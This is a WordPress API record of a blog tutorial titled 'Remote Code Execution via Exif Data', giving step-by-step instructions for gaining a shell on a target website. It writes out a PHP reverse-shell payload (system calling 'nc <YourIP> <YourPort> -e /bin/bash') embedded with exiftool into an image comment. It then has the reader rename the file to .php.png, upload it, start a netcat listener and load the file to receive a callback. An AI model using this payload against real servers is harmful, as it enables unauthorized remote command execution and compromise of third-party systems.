{"id":874,"date":"2020-05-09T03:52:17","date_gmt":"2020-05-09T02:52:17","guid":{"rendered":"http:\/\/zerothcode.com\/blog\/?p=874"},"modified":"2020-10-08T05:35:55","modified_gmt":"2020-10-08T04:35:55","slug":"remote-code-execution-via-exif-data-im-dangerous","status":"publish","type":"post","link":"https:\/\/zerothcode.com\/blog\/remote-code-execution-via-exif-data-im-dangerous\/","title":{"rendered":"Remote Code Execution via Exif Data- I\u2019m Dangerous"},"content":{"rendered":"

Summary :<\/strong><\/p>\n

Exif stands for Exchangeable Image File Format. Exif Data stores sensitive information like Geo-location, Date, Name of the camera, Modified date, Time, Sensing Method, File Source, Type of compression etc. in the photos you click. Now this data resides in the every photo you take using cameras. Everyone knows what the exif data is but very few are aware about how dangerous it is.<\/p>\n

So I have found a technique using which an attacker can gain\u00a0Remote Code Execution\u00a0<\/strong>if the exif data is not stripped by the server. Basically what people does, if they found\u00a0Exif Data\u00a0<\/strong>vulnerability they simply report it which has the 2 tier of severity :<\/p>\n

    \n
  1. Automatic User Enumeration \u2192 P3 (severity)<\/li>\n
  2. Manual User Enumeration \u2192 P4 (severity)<\/li>\n<\/ol>\n

    But what if they convert it into RCE ? It will have more effect than the normal\u00a0Exif Data\u00a0<\/strong>vulnerability. So let\u2019s check it how it is done.<\/p>\n

    \n
    \n
    \n
    \n
    \n
    <\/div>\n

    <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n

    How to find this vulnerability ?<\/strong><\/p>\n

      \n
    1. Go to your target website and check for the Exif Data vulnerability<\/li>\n
    2. Now take an image and insert a payload in it using\u00a0exiftool<\/a><\/li>\n<\/ol>\n

      Payload :<\/strong>\u00a0exiftool -Comment=\u2019<?php system(\u201cnc <YourIP> <YourPort> -e \/bin\/bash\u201d); ?>\u2019 filename.png<\/p>\n

      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      Inserting Payload<\/figcaption><\/figure>\n

      3. Now in order to execute this file we need to modify the extension because .png is not an executable format, so use this command to modify the file extension<\/p>\n

      Command (linux) :<\/strong>\u00a0mv filename.png filename.php.png<\/p>\n

      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      Modifying File<\/figcaption><\/figure>\n

      4. Now upload the file to your target website<\/p>\n

      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      Upload File<\/figcaption><\/figure>\n
      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      File Uploaded<\/figcaption><\/figure>\n

      5. Start netcat listener on your machine<\/p>\n

      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      Netcat Listener<\/figcaption><\/figure>\n

      6. Now visit the URL where the file is uploaded (eg.\u00a0https:\/\/www.targetwebsite.com\/<\/a>profile\/filename.php.png)<\/p>\n

      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      Callback<\/figcaption><\/figure>\n

      7. Run the commands<\/p>\n

      \n
      \n
      \n
      \n
      \n
      <\/div>\n

      <\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>

      Remote Code Execution<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":"

      Summary : Exif stands for Exchangeable Image File Format. Exif Data stores sensitive information like Geo-location, Date, Name of the<\/p>\n","protected":false},"author":1,"featured_media":875,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[51],"tags":[],"yst_prominent_words":[65,636,171,1235,1243,1239,1234,1233,1242,1158,1241,1238,1213,383,342,627,1240,1237,1236,180],"class_list":["post-874","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-tutorials"],"_links":{"self":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/874","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/comments?post=874"}],"version-history":[{"count":0,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/posts\/874\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media\/875"}],"wp:attachment":[{"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/media?parent=874"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/categories?post=874"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/tags?post=874"},{"taxonomy":"yst_prominent_words","embeddable":true,"href":"https:\/\/zerothcode.com\/blog\/wp-json\/wp\/v2\/yst_prominent_words?post=874"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}